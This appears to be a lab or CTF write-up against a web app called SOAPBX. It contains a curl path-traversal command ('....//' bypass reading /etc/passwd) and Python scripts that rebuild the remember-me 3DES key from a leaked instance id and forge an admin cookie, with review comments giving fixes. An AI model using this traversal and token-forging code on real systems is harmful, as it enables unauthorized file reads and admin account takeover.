Application called SOAPBX
Create a new account; then you can use the LFI to retrieve various files, such as the instanceid and apikey.
Local file inclusion, bypassing the basic filter in the /download endpoint, which replaces `../` with nothing (an empty string). The replacement is applied once, non-recursively, so `....//` collapses back to `../` after the filtered substring is removed.
# Path-traversal read through /download: the id parameter is treated as a
# file path. The filter described above drops "../" once, non-recursively,
# so "....//" turns back into "../" after the replacement and the traversal
# survives. --path-as-is stops curl itself from normalising the dot segments
# away before the request is sent. Server-side fix: resolve the requested
# name to a canonical absolute path and reject anything outside the download
# directory — or better, look files up by an opaque id rather than a path.
# The JSESSIONID / rememberme values are presumably the session captured
# during this test.
# NOTE(review): the doubled backslashes and the <...> around both URLs look
# like artifacts of the page export rather than part of the original command.
curl --path-as-is -i -s -k -X $'GET' \\
-H $'Host: 192.168.181.155' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'DNT: 1' -H $'Sec-GPC: 1' -H $'Connection: keep-alive' -H $'Referer: <http://192.168.181.155/story/2>' -H $'Upgrade-Insecure-Requests: 1' -H $'Priority: u=0, i' \\
-b $'JSESSIONID=FBC9ED4617C48911934D754A53708BC6; rememberme=test1.0n1OFRIlXGX2UVL84XNhiliSx-dysALbbwKQaobnyrCVA9uY_cZPh5rjX2zy0BFhZaa87vjSKPCluxSgUITNASnZIDn1MJ_2' \\
$'<http://192.168.181.155/download?id=....//....//....//....//....//....//....//etc/passwd>'
The API doesn't seem to have any endpoint worth exploiting, judging by the config.
instanceid looks juicy
There is a class called encryptUtil.class that takes the user, token and salt; it is used by the rememberme-token code, where it creates a hash code.
The developer missed an `i` in isValidRememberMe and getIdFromRememberMe, making the code vulnerable to recreation of a cookie.
Almost working
from pyDes import *
import hashlib
import base64
# Manual reconstruction of one user's remember-me token, followed by an
# attempt at minting one for the admin account. Why this is possible: the
# 3DES key below is derived only from the instance salt and the user's
# e-mail address (sha512(salt + email)[:24]). Neither input is a server-held
# secret — per the notes above the salt appears to be the instanceid read
# through the /download traversal — so anyone holding both can recompute
# the key. Defensive fix: mix a per-instance secret that never leaves the
# server into the derivation, and authenticate the token (e.g. an HMAC)
# instead of relying on 3DES-ECB, which provides no integrity protection.
cookie = '''test1.dJChkI5W84WWOOccIMIxwepftFzpOi9TSrxqpFB7yaOFcoOd8AWAEJdvy3UKM2pmZU93EqCnktiQKAqzZJ8KnCnZIDn1MJ_2'''  # full cookie value (username.token); note: not referenced below
keytext =''  # overwritten further down
#raw_data = 'cWen1JuUM4LLNfi-6DXqlAVC4E8AeMW7-VtbKanfqQprsgPNl9Cn6F3MUKOXbS4F82m-y9BimG131KA5V7CKhinZIDn1MJ_2'
raw_data = 'FmQsU5ZO13El-p1hMbJ3kom2MxGMesH_iuNkeW5RnJ54QW6ruQ_bwavIeMEAcdgwC586GYUvI7gNDCoTGIEpuinZIDn1MJ_2'  # token part only (after "user."); URL-safe base64, hence the '-' and '_'
b64_data = base64.urlsafe_b64decode(raw_data)
print(b64_data)
user_email = f"[email protected]"  # NOTE(review): looks like an anonymised placeholder from the page export
salt = f"8603f3be-f597-48b1-be2c-ff95236fc029"  # presumably the instanceid recovered earlier — see notes above
keytext = (salt + user_email).encode('utf-8')  # salt first, then the address
print(keytext)
key = hashlib.sha512(keytext).digest()[:24]  # 24 bytes: the key length triple_des is given here
print(key)
enc = triple_des(key=key,mode=ECB)  # ECB: every 8-byte block encrypted independently, no IV, no integrity tag
raw_cookie = enc.decrypt(data=b64_data,pad=None,padmode=PAD_PKCS5).decode('utf-8').split('|')[0]  # strip PKCS#5 padding, keep the first '|'-separated field
print(raw_cookie)
# forge: the same derivation with the admin's address yields the admin's key
admin_email="[email protected]"  # NOTE(review): same placeholder pattern as user_email above
admin_username="admin"  # not used below
admin_keytext=(salt + admin_email).encode('utf-8')
print('admin_keytext',admin_keytext)
admin_key = hashlib.sha512(admin_keytext).digest()[:24]
print('admin_key',admin_key)
cookie_str= raw_cookie + '|1'  # first field from the decrypted token, second field hard-coded to "1" — meaning not established here
print('cookie_str', cookie_str)
alg = triple_des(key=admin_key,mode=ECB,pad=None)
admin_cookie = base64.urlsafe_b64encode(alg.encrypt(data=cookie_str,padmode=PAD_PKCS5))  # mirror of the decode path: PKCS#5 pad, 3DES-ECB, URL-safe base64
print(admin_cookie)
working on this
from pyDes import *
import hashlib as hl
import base64 as b64
import requests as r
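def new_account(timeout=10):
    """Register the throw-away test account on the target via /signup.

    Posts the signup form and prints the raw response body so the result
    can be inspected by eye; nothing is returned.

    Args:
        timeout: seconds to wait for connect/read before requests gives up.
            The original call passed no deadline, so a stalled host would
            block the script indefinitely.
    """
    target = '192.168.181.155'
    endpoint = 'http://' + target + '/signup'
    # NOTE(review): '[email protected]' looks like an anonymised placeholder
    # left by the page export rather than the address actually used.
    form = {
        'email': '[email protected]',
        'username': 'hackerman',
        'password': 'password123',
        'submit': 'Submit',
    }
    response = r.post(endpoint, data=form, timeout=timeout)
    print(response.text)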
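def login_new(timeout=10):
    """Log in as the test account with "remember me" set and dump what comes back.

    Prints the response body, then one ``name value`` line per cookie set
    on the response; the remember-me cookie is presumably among them (the
    decoding helpers below expect its token part). Returns None.

    Args:
        timeout: seconds to wait for connect/read before requests gives up.
            The original call passed no deadline and could hang forever.
    """
    target = '192.168.181.155'
    endpoint = 'http://' + target + '/login'
    form = {
        'username': 'hackerman',
        'password': 'password123',
        'rememberme': 'true',
        'submit': 'Submit',
    }
    response = r.post(endpoint, data=form, timeout=timeout)
    print(response.text)
    # response.cookies holds only cookies set by this final response; cookies
    # set on an earlier redirect hop live on the entries of response.history.
    for cookie in response.cookies:
        print(cookie.name, cookie.value)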
def create_key(email, uuid):
    """Derive the 24-byte 3DES key the application uses for one user.

    The key is the first 24 bytes of SHA-512 over ``uuid + email`` (salt
    first, then the address). It is a pure function of those two inputs —
    nothing server-private is mixed in — which is why a token can be
    re-created by anyone who knows the instance salt and a user's e-mail.
    Mixing a server-held secret into the derivation, or authenticating the
    token with an HMAC, would remove that property.

    Prints the key (debug output kept from the original) and returns it.
    """
    material = f"{uuid}{email}".encode("utf-8")
    digest = hl.sha512(material).digest()
    key = digest[:24]
    print(key)
    return key
def raw_cookie(cookie, key):
    """Decrypt one remember-me token and return its first ``|``-separated field.

    ``cookie`` is the URL-safe base64 token (going by the captures above,
    the part after ``user.`` in the cookie value); ``key`` is the 24-byte
    3DES key from create_key(). The token is 3DES in ECB mode with PKCS#5
    padding: ECB carries no integrity check, so nothing stops a recipient
    who can derive the key from reading or re-encrypting the fields.
    Prints the field (kept from the original) and returns it.
    """
    token = b64.urlsafe_b64decode(cookie)
    cipher = triple_des(key=key, mode=ECB)
    plaintext = cipher.decrypt(data=token, pad=None, padmode=PAD_PKCS5)
    first_field = plaintext.decode('utf-8').split('|')[0]
    print(first_field)
    return first_field
def admin_cookie(raw_cookie):
    """Placeholder for building a token for another account.

    Unfinished in the original: it ignores ``raw_cookie``, binds an empty
    string and returns None. The in-progress sketch is the flat script
    earlier in this file.
    """
    return None
def main():
    """Script entry point: currently only exercises login_new().

    Account creation (noted as working) and the key / token reconstruction
    calls are left commented out in the original and are not run here.
    """
    login_new()
# Run main() only when executed directly, not when imported.
if __name__ == "__main__":
    main()